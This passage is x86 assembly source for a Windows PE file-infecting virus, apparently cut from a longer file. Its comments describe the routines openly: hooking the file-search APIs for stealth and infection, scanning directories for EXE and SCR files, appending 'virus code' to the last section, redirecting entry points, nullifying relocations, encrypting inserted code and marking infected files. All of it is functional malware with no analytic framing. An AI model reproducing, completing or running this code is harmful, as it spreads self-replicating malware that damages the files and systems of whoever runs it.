get_ebp2_Uni2Ansi ;get EBP to reference internal variablez correctly and convert unicode string to ansi (for unicode version APIz) + jecxz go_ret_2Pshd + mov edi,[ebp + pPathNamez - ebp_num] ;get pointer to new entry in pathnamez table + lea ebx,[ebp + PathNamez + nPATHNAMEZ - MAX_PATH - ebp_num] ;get top of pathnamez table + cmp edi,ebx + jnc go_ret_2Pshd ;if not enough space to store filename, jump + mov ebx,edi + @copysz ;copy filename to pathnamez table +next2_ff: mov al,[edi - 1] ;get end of path.. 
+ add al,-'\' + jz eop_ff + sub al,':' - '\' + jz eop_ff + dec edi + cmp ebx,edi + jc next2_ff + xor al,al +eop_ff: stosb ;force null to split path from filename + mov [ebp + pPathNamez - ebp_num],edi ;update pointer to next entry in pathnamez table + call get_handle_ofs_0 ;get new free entry in handlez table + jc go_ret_2Pshd + mov eax,[esp.Pushad_eax] ;get handle returned by findfirst + stosd ;store handle into handlez table + xchg eax,ebx + stosd ;store pointer to asociated pathname into handlez table as well + mov [ebp + pHandlez - ebp_num],edi ;update pointer to next entry in handlez table + xchg esi,eax + jmp FindCommon + +go_ret_2Pshd: popad ;return to caller + ret (2*Pshd) + +NewFindNextFileW: ;new findnext API handler.. infect files, stealth (unicode version) + + test al,? ;clear carry (unicode version) + org $ - 1 + +NewFindNextFileA: ;new findnextt API handler.. infect files, stealth (ansi version) + + stc ;set carry (ansi version) + call APICall@n_2 ;call old findnext API + pushad + call get_handle_ofs_ebp ;get correct entry in handlez table acordin to handle + jc go_ret_2Pshd + mov esi,[edi + 4] ;get respective pathname + +FindCommon: lea edi,[ebp + PathName - ebp_num] + @copysz ;copy pathname to respective buffer + dec edi + mov ebx,[esp.cPushad.Arg2] ;get WIN32_FIND_DATA parameter + or al,[ebp + uni_or_ansi - ebp_num] ;check if its ansi or unicode + lea esi,[ebx.WFD_szFileName] ;get filename + jnz its_ansi_fc + call Uni2Ansi ;its unicode, convert to ansi and atach filename to pathname +its_ansi_fc: call Process_File3 ;try to infect file + call get_size ;get file size + jnz go_ret_2Pshd + test [ebx.WFD_nFileSizeLow.hiw.hib],11111100b ;filesize > 64MB? 
+ jnz go_ret_2Pshd ;yea, file too large, jump + div ecx + dec edx + jns go_ret_2Pshd ;if not infected, jump, stealth not necesary + call check_PE_file ;file is infected, do size stealth + jmp go_ret_2Pshd + +NewFindCloseX: mov cl,1 + call APICall@n ;call old findclose API + pushad + call get_handle_ofs_ebp ;get correct entry in handlez table acordin to handle + jc go_ret_Pshd + lea esi,[edi + 4] + mov ecx,[ebp + pHandlez - ebp_num] + lodsd + sub ecx,esi + pushad + xchg esi,eax ;remove pathname entry + mov ecx,[ebp + pPathNamez - ebp_num] + mov edi,esi + @endsz + sub ecx,esi + mov [esp.Pushad_ebx],ecx + rep movsb + mov [ebp + pPathNamez - ebp_num],edi ;update pointer to handlez table + popad + shr ecx,3 ;remove handle entry + jz setH_fc +FixpPathNamez: movsd + lodsd + sub eax,ebx + stosd + loop FixpPathNamez +setH_fc: mov [ebp + pHandlez - ebp_num],edi ;update pointer to pathnamez table +go_ret_Pshd: popad + ret (Pshd) + +Open&MapFile proc ;open and map file in read only mode + ; on entry: + ; ESI = pszFileName (pointer to file name) + ; on exit: + ; ECX = 0, if error + ; ECX = base adress of memory-maped file, if ok + + xor edi,edi + +Open&MapFileAdj: ;open and map file in read/write mode + ; on entry: + ; EDI = file size + work space (in bytes) + ; ESI = pszFileName (pointer to file name) + ; on exit: + ; ECX = 0, if error + ; ECX = base adress of memory-maped file, if ok + ; EDI = old file size + + xor eax,eax + push eax ;0 + push eax ;FILE_ATTRIBUTE_NORMAL + push OPEN_EXISTING + push eax ;NULL + mov al,1 + push eax ;FILE_SHARE_READ + ror eax,1 ;GENERIC_READ + mov ecx,edi + jecxz $ + 4 + rcr eax,1 ;GENERIC_READ + GENERIC_WRITE + push eax + push esi ;pszFileName + call [ebp + ddCreateFileA - ebp_num] ;open file + cdq + xor esi,esi + inc eax + jz end_Open&MapFile ;if error, jump + dec eax + push eax ;push first handle + + push edx ;NULL + push edi ;file size + buffer size + push edx ;0 + mov dl,PAGE_READONLY + mov ecx,edi + jecxz $ + 4 + shl dl,1 ;PAGE_READWRITE + 
push edx + push esi ;NULL + push eax ;handle + call [ebp + ddCreateFileMappingA - ebp_num] ;create file mapping + cdq + xchg ecx,eax + jecxz end_Open&MapFile2 ;if error, close handle and jump + push ecx ;push second handle + + push edi ;file size + buffer size + push edx ;0 + push edx ;0 + mov dl,FILE_MAP_READ + test edi,edi + .if !zero? + shr dl,1 ;FILE_MAP_WRITE + mov edi,[ebx.WFD_nFileSizeLow] + .endif + push edx + push ecx ;handle + call [ebp + ddMapViewOfFile - ebp_num] ;map view of file + xchg ecx,eax + jecxz end_Open&MapFile3 + push ecx ;push base adress of memory-maped file + + jmp [esp.(3*Pshd).RetAddr] ;jump to return adress leavin parameterz in the stack + +Open&MapFile endp + +Close&UnmapFile proc ;close and unmap file previosly opened in read only mode + + xor edi,edi + +Close&UnmapFileAdj: ;close and unmap file previosly opened in read/write mode + + pop [esp.(4*Pshd).RetAddr - Pshd] + call [ebp + ddUnmapViewOfFile - ebp_num] ;unmap view of file + +end_Open&MapFile3: + + call [ebp + ddCloseHandle - ebp_num] ;close handle + mov ecx,edi + jecxz end_Open&MapFile2 ;if read-only mode, jump + pop eax + push eax + push eax + xor esi,esi + push esi + push esi + push edi + push eax + xchg edi,eax + call [ebp + ddSetFilePointer - ebp_num] ;move file pointer to the real end of file + call [ebp + ddSetEndOfFile - ebp_num] ;truncate file at real end of file + lea eax,[ebx.WFD_ftLastWriteTime] + push eax + push esi + push esi + push edi + call [ebp + ddSetFileTime - ebp_num] ;restore original date/time stamp field + +end_Open&MapFile2: + + call [ebp + ddCloseHandle - ebp_num] ;close handle + +end_Open&MapFile: + + xor ecx,ecx + ret + +Close&UnmapFile endp + +get_ebp2_Uni2Ansi: ;this function sets EBP register to reference internal + ; variablez correctly and also converts unicode + ; strings to ansi (for unicode version APIz only). + ;this function is only useful at the resident stage. 
+ ;on entry: + ; TOS+28h (Pshd.cPushad.Arg1): pointer to specified file name + ;on exit: + ; ECX = 0, if error + + mov esi,[esp.(Pshd).cPushad.Arg1] ;get source pointer to specified file name + call get_ebp2 ;get actual EBP + lea edi,[ebp + PathName - ebp_num] ;get target pointer to internal buffer + jc ansiok + +Uni2Ansi: ;this function converts an ansi string to a unicode string + ;on entry: + ; ESI = pointer to specified file name + ;on exit: + ; ECX = 0, if error + + xor eax,eax + push eax ;NULL + push eax ;NULL + push MAX_PATH + push edi ;target pointer + push -1 + push esi ;source pointer + push eax + push eax ;CP_ACP + call [ebp + ddWideCharToMultiByte - ebp_num] + mov esi,edi +ansiok: xchg ecx,eax + cld + ret + +Rva2Raw proc ;this function converts RVA valuez to RAW pointerz inside PE + ; filez. This function is specialy useful for memory-maped + ; filez. + ;given a RVA value, this function returns the start adress + ; and size of the section containin it, plus its relative + ; delta value inside the section. + ;on entry: + ; EAX = RVA value + ; EBP = start of memory-maped file (MZ header) + ; ESI = start of PE header + 3Ch + ;on exit: + ; EBP = RAW size of section + ; EBX = RAW start of section + ; ECX = 0, if not found + ; start of respective section header (+ section header + ; size), if found + ; EDX = RVA start of section + ; ESI = relative delta of RVA value inside section. + + movzx ecx,word ptr [esi.NT_FileHeader \ ;get number of sectionz + .FH_NumberOfSections \ + -MZ_lfanew] + jecxz end_Rva2Raw + movzx ebx,word ptr [esi.NT_FileHeader \ ;get first section header + .FH_SizeOfOptionalHeader \ + -MZ_lfanew] + lea ebx,[esi.NT_OptionalHeader + ebx - MZ_lfanew] + x = IMAGE_SIZEOF_SECTION_HEADER + +match_virtual: ;scan each PE section header and determine if specified RVA + ;value points inside + + mov esi,eax + mov edx,[ebx.SH_VirtualAddress] + sub esi,edx + sub ebx,-x + cmp esi,[ebx.SH_VirtualSize - x] ;is RVA value pointin inside current section? 
+ jb section_found ;yea we found the section, jump + loop match_virtual ;nope, get next section + +end_Rva2Raw: + + ret + +Rva2Raw endp + +get_handle_ofs_ebp: ;this function sets EBP register to reference internal + ; variablez correctly and also given a handle, it gets + ; a pointer to an entry in the handlez table. + ;this function is only useful at the resident stage. + ;on entry: + ; TOS+28h (Pshd.cPushad.Arg1): specified handle + ;on exit: + ; EDI = pointer to entry in handlez table + ; Carry clear, if ok + ; Carry set, if error + + xchg ecx,eax + jecxz end_gho_stc + call get_ebp2 + mov ecx,[esp.(Pshd).cPushad.Arg1] ;get handle + jecxz end_gho_stc + xchg eax,ecx + cmp ax,? + org $ - 2 + +get_handle_ofs_0: ;gets a pointer to an empty entry in the handlez table + ;this function is only useful at the resident stage. + ;on exit: + ; EDI = pointer to entry in handlez table + ; Carry clear, if ok + ; Carry set, if error + + sub eax,eax + +get_handle_ofs: ;given a handle, this function gets a pointer + ; to an entry in the handlez table. + ;this function is only useful at the resident stage. + ;on entry: + ; EAX = specified handle + ;on exit: + ; EDI = pointer to entry in handlez table + ; Carry clear, if ok + ; Carry set, if error + + lea edi,[ebp + Handlez - 8 - ebp_num] + lea edx,[edi + nHANDLEZ] + next_gho: scasd ;add edi,8 + scasd ; + cmp edx,edi ;top of handlez table reached? + jc end_gho ;yea, handle not found, jump + cmp eax,[edi] ;do handlez match? + jnz next_gho ;no, check next handle, jump + test al,? ;yea, handle found, clear carry + org $ - 1 + end_gho_stc: stc ;set carry + end_gho: ret + +section_found: + + x = IMAGE_SIZEOF_SECTION_HEADER + xchg ebp,ebx + add ebx,[ebp.SH_PointerToRawData - x] ;get RAW start of section + xchg ecx,ebp + mov ebp,[ecx.SH_SizeOfRawData - x] ;get RAW size of section + cld + ret + +get_relocs: ;this comon funtion is called from both instalation and + ; infection stage. 
+ ;it simply locates each relocation block in the .reloc section + ; and calls a function to (a) nulify those dangerous reloca- + ; tionz in a block (infection stage) or (b) to fix the code + ; pointed to by such marked relocationz (instalation stage). + ;on entry: + ; EDI = RVA start pointer to chunk of code + ; TOS+04h (Arg1): fix_relocs label function adress (instalation stage) + ; or + ; nul_relocs label function adress (infection stage) + ; TOS+00h (return adress) + + add esi,ebx ;get start of relocation section in aplication context + add edx,edi ;get end adress of chunk code + lea ebp,[ecx+esi] ;get end of relocation section in aplication context + +process_reloc_blocks: + + lodsd + xchg ebx,eax ;get start RVA for this block of relocationz + lea ecx,[ebx + 4096] ;get end RVA where relocationz can point in a block + lodsd ;get size of reloc block + x = IMAGE_SIZEOF_BASE_RELOCATION + add eax,-x + cmp edi,ecx ;RVA pointer inside relocation block? (check low boundary) + lea ecx,[eax + esi] ;get next block adress + push ecx + jnc next_reloc_block + shr eax,1 + cmp ebx,edx ;RVA pointer inside relocation block? (check high boundary) + jnc next_reloc_block + xchg ecx,eax ;get number of relocationz for this block + jecxz next_reloc_block + + call [esp.(Pshd).Arg1] ;call fix_relocs function or nul_relocs function + +next_reloc_block: + + pop esi ;get next block adress + lea eax,[esi + x] + cmp eax,ebp ;end of relocation blockz? + jc process_reloc_blocks ;no, process the block, jump + ret (Pshd) ;yea, no more relocation blockz, return + +Process_File3: ;this function copies a filename to an internal buffer + ; and checks the extension thru a list of infectable + ; extensions (EXE and SCR filez for the moment). If + ; the extension matches, the file will be infected. 
+ @copysz + mov edx,not 0FF202020h ;upercase mask + mov ecx,[edi-4] ;get filename extension + lea esi,[ebp + Exts - ebp_num] ;get pointer to list of extensionz + and ecx,edx ;convert file extension to upercase + +next_ext: + + lodsd ;get extension from list + dec al ;no more extensionz? + js end_PF3 + and eax,edx ;convert extension to upercase + dec esi + xor eax,ecx ;do extensionz match? + jnz next_ext + cmp byte ptr [edi-5],'.' + jnz end_PF3 ;no, get next extension + call Process_File2 ;yes, extensionz match, infect file + +end_PF3: ret + +err_Rva2Raw: + + popad ;needed to unwind the stack from some function + +err_Rva2Raw2: + + popad ;needed to unwind the stack from some function + ret + +Attach proc ;attach virus code to last section in the PE file and + ; change section characteristicz to reflect infection. + ;on entry: + ; ECX = base of memory-maped file + ; EDI = original file size + ;on exit: + ; EDI = new file size + + lea esi,[ecx.MZ_lfanew] ;get base of PE header + 3Ch + mov eax,[ebp + pcode_start - ebp_num] ;get start adress of virus code + add esi,[esi] + mov edx,[esi.NT_OptionalHeader \ ;get built-in image base + .OH_ImageBase \ + -MZ_lfanew] + pushad ;save valuez to stack + xor eax,eax + x = IMAGE_SIZEOF_SECTION_HEADER + sub al,-x + mul byte ptr [esi.NT_FileHeader \ ;get number of sectionz + .FH_NumberOfSections \ + -MZ_lfanew] + add ax,word ptr [esi.NT_FileHeader \ ;get first section header + .FH_SizeOfOptionalHeader \ + -MZ_lfanew] + jc err_Rva2Raw2 + lea ebx,[esi.NT_OptionalHeader - MZ_lfanew + eax] + mov eax,[esi.NT_OptionalHeader.OH_SectionAlignment - MZ_lfanew] + mov edx,[esi.NT_OptionalHeader.OH_FileAlignment - MZ_lfanew] + dec eax + dec edx + or eax,edx ;check SectionAlignment and FileAlignment fieldz + cmp eax,10000h + jnc err_Rva2Raw2 ;too large? 
+ add edi,ecx ;get end of file in MM-file + inc al + jnz err_Rva2Raw2 + mov eax,[ebx.SH_VirtualAddress - x] + mov ebp,ecx ;get MM-file base address + add eax,edi + add ecx,[ebx.SH_PointerToRawData - x] + sub eax,ecx ;get new RVA entry point + +;at this point: +; +; cPushad.EAX = source adress of code to copy (start at encrypted stringz) +; cPushad.EBX = embedded (in PE header) host base address +; EBP = start of MM-file. Base address of MM-file +; EAX = new RVA entry point (start of virus code RVA) +; EDX = file alignment - 1 +; EDI = target adress where code will be copied to in the MM-File +; ECX = start adress of last section in the MM-file +; EBX = start adress of last section header (plus section header size) +; in the MM-file +; ESI = start of PE header (+ 3Ch) in the MM-file + + pushad + mov eax,[esi.NT_OptionalHeader \ ;get current entry point + .OH_AddressOfEntryPoint \ + -MZ_lfanew] + +;on entry: +; +; EAX = Host EntryPoint RVA +; EBP = start of MZ header (start of MM-file) +; ESI = start of PE header + 3Ch (in MM-file) + + call Rva2Raw ;find true code section (clue: EntryPoint RVA points inside) + +;on exit: +; +; EBP = raw size of CODE section +; EBX = raw start of CODE section +; ECX = 0, if not found +; start of CODE section header (+ section header size), if found +; EDX = start of CODE section RVA +; ESI = relative delta of RVA inside CODE section. + + jecxz err_Rva2Raw ;code section not found, invalid EntryPoint + pushad + mov ebp,esp + mov edx,[ebp.(2*cPushad).Pushad_ebp] ;get original ebp + x = IMAGE_SIZEOF_SECTION_HEADER + or byte ptr [ecx.SH_Characteristics.hiw.hib - x],20h ;set exec bit to section + +exec_set: + + mov esi,[edx + ImportHdr - ebp_num] ;get import section header + xor ecx,esi ;is import table inside code section? + jz IT_in_Code ;yea, jump + + ;import table NOT inside code section (i.e. 
probably exists an .idata section) + + or byte ptr [esi.SH_Characteristics.hiw.hib - x],80h ;set writable bit + +IT_in_Code: ;import table is inside code section (stupid microsoft) + ;no need to set the writable bit (the exec bit does the job) + + sub ecx,ecx + push edi ;need this value l8r, push it + mov cl,5 + sub eax,0B2FD26A3h +sub_1st_val = dword ptr $ - 4 + add edi,ecx ;add edi,5 + stosd + push edi + mov eax,ecx ;ax = 5 + stosw + sub al,- 0e9h + 5 ;al = E9h + stosb + mov eax,[ebp.cPushad.Pushad_eax] ;get RVA start of virus code + sub eax,[ebp.Pushad_eax] + sub eax,ecx ;sub eax,5 + stosd + xor eax,eax + pop esi + stosw ;0 + mov edi,[ebp.Pushad_eax] + +nulify_relocs: ;nulify relocs that could overwrite our inserted chunks of code.. + + push edi + lodsw + cwde + pushad + mov esi,[ebp.cPushad.Pushad_esi] ;get PE header (+ 3Ch) + mov ecx,[esi.NT_OptionalHeader \ ;get size of relocation blockz + .OH_DirectoryEntries \ + .DE_BaseReloc \ + .DD_Size \ + -MZ_lfanew] + jecxz go_popad ;no relocationz, jump + push eax ;save size of this chunk of code temporarily + push ecx + mov ebp,[ebp.cPushad.Pushad_ebp] ;get base of MM-file (MZ header) + mov eax,[esi.NT_OptionalHeader \ ;get RVA start of relocation blockz + .OH_DirectoryEntries \ + .DE_BaseReloc \ + .DD_VirtualAddress \ + -MZ_lfanew] + call Rva2Raw ;convert RVA to a raw offset inside the section + pop eax + pop edx ;retrieve size of this chunk of code temporarily + jecxz go_popad + xchg ecx,eax + call mark_reloc ;pass nul_relocs as a parameter to get_relocs function + +nul_relocs: + + lodsw ;get relocation item + cwde + ror eax,3*4 + add al,- IMAGE_REL_BASED_HIGHLOW ;check relocation type + jnz n_next_reloc ;not valid, get next relocation item + shr eax,5*4 ;strip or blank relocation type field from relocation item + lea eax,[eax + ebx + 4] ;convert relocation pointer to RVA + cmp edi,eax ;check if relocation points to our chunk of code.. 
+ jnc n_next_reloc ;check low boundary
+ add eax,-4
+ cmp eax,edx ;check high boundary
+ jnc n_next_reloc ;it doesnt point to our chunk of code, get next relocation item
+
+ ;this relocation item is pointing inside our chunk of code..
+ ;nulify and mark it!
+
+ and byte ptr [esi.hib - 2],not (mask RD_RelocType shr 8) ;nulify relocation!
+
+n_next_reloc:
+
+ loop nul_relocs ;get next relocation item
+ ret
+
+mark_reloc:
+
+ call get_relocs
+
+go_popad:
+
+ popad
+ xchg ecx,eax ;size of this chunk of code
+ add edi,[ebp.Pushad_ebx] ;convert RVA start of chunk of code to a raw value
+ sub edi,[ebp.Pushad_edx]
+
+pre_crypt:
+
+ lodsb ;encrypt chunk of code..
+ xchg [edi],al
+ ror al,cl
+ inc edi
+ xor al,06Ah
+_xor_2nd_val = byte ptr $ - 1
+ mov [esi-1],al
+ loop pre_crypt
+ lodsw ;get next chunk of code
+ cwde
+ pop edi
+ xchg ecx,eax ;no more chunkz?
+ jecxz pre_crypt_done
+ sub edi,ecx ;point EDI to next chunk
+ jmp nulify_relocs ;check relocationz, jump
+
+pre_crypt_done:
+
+ sub al,-0e8h ;build 'call' instruction
+ pop edi
+ stosb
+ lea eax,[eax + get_base - code_start - 4 - 0e8h + esi] ;
+ sub eax,edi
+ stosd
+ mov cx,(v_end - code_start + 3)/4
+ add eax,edi
+ mov edi,[ebp.cPushad.cPushad.Pushad_eax] ;get start of virus code
+ mov edx,[ebp.cPushad.cPushad.Pushad_edx] ;get embedded base
+ xchg esi,edi
+ rep movsd ;copy virus code
+ sub ecx,[ebp.cPushad.Pushad_eax]
+ mov [ebp.cPushad.Pushad_edi],edi
+ add ecx,-5
+ mov [eax + old_base - get_base],edx ;hardcode some valuez..
+ mov [eax + delta_host - get_base],ecx
+ popad
+ popad
+
+ x = IMAGE_SIZEOF_SECTION_HEADER
+
+ sub edi,ecx ;change characteristicz of last section in the PE header..
+ lea ecx,[edx + edi]
+ xchg edx,eax
+ inc eax
+ cdq ;edx=0
+ xchg ecx,eax
+ div ecx ;calculate new size of last section
+ mul ecx
+ xchg eax,edi
+ mov ecx,[esi.NT_OptionalHeader.OH_SectionAlignment - MZ_lfanew]
+ sub eax,v_end - virtual_end
+ cmp [ebx.SH_VirtualSize - x],eax ;calculate new virtual size of last section
+ jnc n_vir
+ mov [ebx.SH_VirtualSize - x],eax
+ n_vir: dec eax
+ mov [ebx.SH_SizeOfRawData - x],edi ;update size of last section
+ add eax,ecx
+ div ecx
+ mul ecx
+ pop ebp ;get original file size
+ add eax,[ebx.SH_VirtualAddress - x]
+ cmp [esi.NT_OptionalHeader.OH_SizeOfImage - MZ_lfanew],eax ;update size of image field in the PE header
+ jnc n_img
+ mov [esi.NT_OptionalHeader.OH_SizeOfImage - MZ_lfanew],eax
+ n_img: add edi,[ebx.SH_PointerToRawData - x]
+ sub ecx,ecx
+ or byte ptr [ebx.SH_Characteristics.hiw.hib - x],0C0h ;change section flagz
+ push ebp
+ mov eax,[esi.NT_OptionalHeader.OH_CheckSum - MZ_lfanew] ;calculate special checksum to mark infected filez
+ xor ebp,eax
+ add al,-2Dh
+ xor ebp,0B2FD26A3h xor 0D4000000h
+ not al
+ xor al,ah
+ shl ebp,6
+ xor al,byte ptr [esi.NT_OptionalHeader.OH_CheckSum.hiw - MZ_lfanew]
+ shr al,2
+ shld eax,ebp,3*8+2
+ mov [esi.NT_FileHeader.FH_TimeDateStamp - MZ_lfanew],eax ;store checksum value
+ pop eax ;get original file size
+ mov cl,65h
+ cmp eax,edi ;calculate new file size..
+ .if carry?
+ xchg edi,eax
+ .endif
+ sub eax,1 - 65h
+ div ecx
+ mul ecx ;use size paddin..
+ push eax
+
+end_Attach:
+
+ popad
+
+needed_ret:
+
+ ret
+
+Attach endp
+
+Process_Dir: ;this function receives a pointer to an asciiz string
+ ; containin a path, then it searches filez with an extension
+ ; matchin the list of extensionz, and finaly infects them.
+ ;on entry:
+ ; EDI = pointer to pathname
+ ; EAX = size of pathname
+
+ dec eax
+ cmp eax,7Fh
+ jnc needed_ret ;if pathname greater than 7Fh characterz, jump
+ pushad
+ mov esi,edi
+ adc edi,eax
+ cld
+ mov al,'\' ;add '\' to the pathname if not included
+ cmp [edi-1],al
+ jz Find_Filez
+ stosb
+
+Find_Filez: ;find filez in the specified pathname..
+
+ push edi
+ sub eax,'\' - '*.*'
+ stosd
+ call findfirst ;find each file "*.*" in the path
+ pop edi
+ jz end_Attach ;if error, jump
+ dec eax
+ push eax ;save search handle
+
+Process_File: ;a file was found, process it
+
+ push edi
+ lea esi,[ebx.WFD_szFileName] ;get filename
+ call Process_File3 ;process file, infect it
+
+Find_Next:
+
+ pop edi
+ pop eax
+ push eax
+ push ebx
+ push eax
+ call [ebp + ddFindNextFileA - ebp_num] ;find next file
+ test eax,eax ;more filez?
+ jnz Process_File ;yea, process it, jump
+
+Find_Close:
+
+ call [ebp + ddFindClose - ebp_num] ;close search
+
+end_Find:
+
+end_Process_Dir:
+
+ popad
+ ret
+
+APICall@n_2: mov cl,2 ;call an API and pass two parameterz
+
+APICall@n proc ;this function calls an API and passes "n" parameterz
+ ; as argumentz
+ ;on entry:
+ ; EAX = API function adress
+ ; ECX = number of paremeterz
+
+ pushfd
+ movzx edx,cl
+ mov ecx,edx
+ push_args: push dword ptr [esp.(2*Pshd) + 4*edx] ;push parameter
+ loop push_args
+ call eax ;call API
+ popfd
+ ret
+APICall@n endp
+
+IGetProcAddressIT:
+
+ pop edx
+ push eax
+ lea eax,[ebp + vszKernel32 - ebp_num]
+ push eax
+ push edx
+
+GetProcAddressIT proc ;gets a pointer to an API function from the Import Table
+ ; (the object inspected is in raw form, i.e. memory-maped)
+ ;on entry:
+ ; TOS+08h (Arg2): API function name
+ ; TOS+04h (Arg1): module name
+ ; TOS+00h (return adress)
+ ;on exit:
+ ; EAX = RVA pointer to IAT entry
+ ; EAX = 0, if not found
+
+ pushad
+
+ lea esi,[ecx.MZ_lfanew]
+ mov ebp,ecx ;get KERNEL32 module handle
+ add esi,[esi] ;get address of PE header + MZ_lfanew
+ mov ecx,[esi.NT_OptionalHeader \ ;get size of import directory
+ .OH_DirectoryEntries \
+ .DE_Import \
+ .DD_Size \
+ -MZ_lfanew]
+ jecxz End_GetProcAddressIT2 ;if size is zero, no API imported!
+ mov eax,[esi.NT_OptionalHeader \ ;get address of Import directory
+ .OH_DirectoryEntries \
+ .DE_Import \
+ .DD_VirtualAddress \
+ -MZ_lfanew]
+ call Rva2Raw ;find size and raw start of import section
+ jecxz End_GetProcAddressIT
+ push esi
+ mov eax,[esp.(Pshd).Pushad_ebp]
+ mov [eax + ImportHdr - ebp_num],ecx ;save raw adress of import section header for l8r use
+ x = IMAGE_SIZEOF_IMPORT_DESCRIPTOR
+
+Get_DLL_Name: ;scan each import descriptor inside import section to match module name specified
+
+ pop esi ;diference (if any) between start of import table and start of import section
+ mov ecx,[ebx.esi.ID_Name] ;get RVA pointer to imported module name
+
+End_GetProcAddressIT2:
+
+ jecxz End_GetProcAddressIT ;end of import descriptorz?
+ sub ecx,edx ;convert RVA pointer to RAW
+ cmp ecx,ebp ;check if it points inside section
+ jae End_GetProcAddressIT
+ sub esi,-x
+ push esi ;save next import descriptor for later retrieval
+ lea esi,[ebx + ecx]
+ mov edi,[esp.(Pshd).cPushad.Arg1] ;get module name specified from Arg1
+
+Next_char_from_DLL: ;do a char by char comparison with module name found inside seccion
+ ;stop when a NULL or a dot '.' is found
+ lodsb
+ add al,-'.'
+ jz IT_nup ;its a dot
+ sub al,-'.'+'a'
+ cmp al, 'z'-'a'+ 1
+ jae no_up
+ add al,-20h ;convert to upercase
+ no_up: sub al,-'a'
+IT_nup: scasb
+ jnz Get_DLL_Name ;namez dont match, get next import descriptor
+ cmp byte ptr [edi-1],0
+ jnz Next_char_from_DLL
+
+Found_DLL_name: ;we got the import descriptor containin specified module name
+
+ pop esi
+ lea eax,[edx + esi.ID_ForwarderChain - x]
+ add esi,ebx
+ mov [esp.Pushad_edx],eax ;store pointer to ForwarderChain field for later use
+ mov [esp.Pushad_esi],esi ;store pointer to import descriptor for later use
+ push dword ptr [esp.cPushad.Arg2]
+ mov eax,[esp.(Pshd).Pushad_ebp]
+ push dword ptr [eax + K32Mod - ebp_num]
+ call GetProcAddressET ;scan export table of specified module handle
+ xchg eax,ecx ;and get function adress of specified API
+ mov ecx,[esi.ID_FirstThunk - x] ;This is needed just in case the API function adressez are bound in the IAT
+ jecxz End_GetProcAddressIT ;if not found then go, this value cant be zero or the IAT wont be patched
+ push eax
+ call GetProcAddrIAT ;inspect first thunk (which later will be patched by the loader)
+ test eax,eax
+ jnz IAT_found ;if found then jump (save it and go)
+ mov ecx,[esi.ID_OriginalFirstThunk - x] ;get original thunk (which later will hold the original unpatched IAT)
+ jecxz End_GetProcAddressIT ;if not found then go, this value could be zero
+ push eax
+ call GetProcAddrIAT ;inspect original thunk
+ test eax,eax
+ jz IAT_found ;jump if not found
+ sub eax,ecx ;we got the pointer
+ add eax,[esi.ID_FirstThunk - x] ;convert it to RVA
+ db 6Bh,33h,0C0h ;imul esi,[ebx],-0C0h ;i like bizarre thingz =8P
+ org $ - 2
+
+End_GetProcAddressIT:
+
+ db 33h,0C0h ;xor eax,eax ;error, adress not found
+
+IAT_found:
+
+ mov [esp.Pushad_eax],eax ;save IAT entry pointer
+ popad
+ ret (2*Pshd) ;jump and unwind parameterz in stack
+
+findfirst: ;this function is just a wraper to the FindFistFileA API..
+
+ lea ebx,[ebp + FindData - ebp_num]
+ push ebx ;args for findfirst
+ push esi ;args for findfirst
+ call [ebp + ddFindFirstFileA - ebp_num] ;call FindFirstFileA API
+
+end_findfirst:
+
+ inc eax
+ cld
+ ret
+
+get_size: ;this function retrieves the file size and discards
+ ; huge filez, it also sets some parameterz for l8r use
+ ;on entry:
+ ; EBX = pointer to WIN32_FIND_DATA structure
+ ;on exit:
+ ; EAX = file size
+ ; ESI = pointer to filename
+ ; Carry clear: file ok
+ ; Carry set: file too large
+
+ xor ecx,ecx
+ test byte ptr [ebx.WFD_dwFileAttributes],FILE_ATTRIBUTE_DIRECTORY
+ jnz get_size_ret ;discard directory entriez
+ mov edx,ecx
+ cmp [ebx.WFD_nFileSizeHigh],edx ;discard huge filez, well if any thaat big (>4GB)
+ mov cl,65h ;load size padin value
+ lea esi,[ebp + PathName - ebp_num] ;get pointer to filename
+ mov eax,[ebx.WFD_nFileSizeLow] ;get file size
+
+get_size_ret:
+
+ ret
+
+GetProcAddrIAT: ;this function scans the IMAGE_THUNK_DATA array of "dwords"
+ ; from the selected IMAGE_IMPORT_DESCRIPTOR, searchin for
+ ; the selected API name. This function works for both
+ ; bound and unbound import descriptorz. This function is
+ ; called from inside GetProcAddressIT.
+ ;on entry:
+ ; EBX = RAW start pointer of import section
+ ; ECX = RVA pointer to IMAGE_THUNK_ARRAY
+ ; EDX = RVA start pointer of import section
+ ; EDI = pointer selected API function name.
+ ; EBP = RAW size of import section
+ ; TOS+04h (Arg1): real address of API function inside selected
+ ; module (in case the descriptor is unbound).
+ ; TOS+00h (return adress)
+ ;on exit:
+ ; EAX = RVA pointer to IAT entry
+ ; EAX = 0, if not found
+
+ push ecx
+ push esi
+ sub ecx,edx
+ xor eax,eax
+ cmp ecx,ebp
+ jae IT_not_found
+ lea esi,[ebx + ecx] ;get RAW pointer to IMAGE_THUNK_DATA array
+
+next_thunk_dword:
+
+ lodsd ;get dword value
+ test eax,eax ;end of IMAGE_THUNK_DATA array?
+ jz IT_not_found
+
+no_ordinal:
+
+ sub eax,edx ;convert dword to a RAW pointer
+ cmp eax,ebp ;dword belongs to an unbound image descriptor?
+ jb IT_search ;no, jump
+ add eax,edx ;yea, we have the API adress itself, reconvert to RVA
+ cmp eax,[esp.(2*Pshd).Arg1] ;API adressez match?
+ jmp IT_found? ;yea, we found it, jump
+
+IT_search:
+
+ push esi ;image descriptor contains imports by name
+ lea esi,[ebx+eax.IBN_Name] ;get API name from import descriptor
+ mov edi,[esp.(5*Pshd).cPushad.Arg2] ;get API name selected as a parameter
+
+IT_next_char: ;find requested API from all imported API namez..
+
+ cmpsb ;do APIz match?
+ jnz IT_new_search ;no, continue searchin
+
+IT_Matched_char:
+
+ cmp byte ptr [esi-1],0
+ jnz IT_next_char
+
+IT_new_search:
+
+ pop esi ;yea, they match, we found it
+
+IT_found?:
+
+ jnz next_thunk_dword
+ lea eax,[edx+esi-4] ;get the pointer to the new IAT entry
+ sub eax,ebx ;convert it to RVA
+
+IT_not_found:
+
+ pop esi
+ pop ecx
+ ret (Pshd)
+
+GetProcAddressIT ENDP
+
+check_PE_file: ;this function opens, memory-maps a file and checks
+ ; if its a PE file
+ ;on entry:
+ ; EBX = pointer to WIN32_FIND_DATA structure
+ ; ESI = pointer to filename
+ ;on exit:
+ ; ESI = 0, file already infected or not infectable
+ ; ESI != 0, file not infected
+
+ call Open&MapFile ;open and memory-map the file
+ jecxz end_PE_file
+ mov eax,[ebx.WFD_nFileSizeLow] ;get file size
+ add eax,-80h
+ jnc Close_File ;file too short?
+
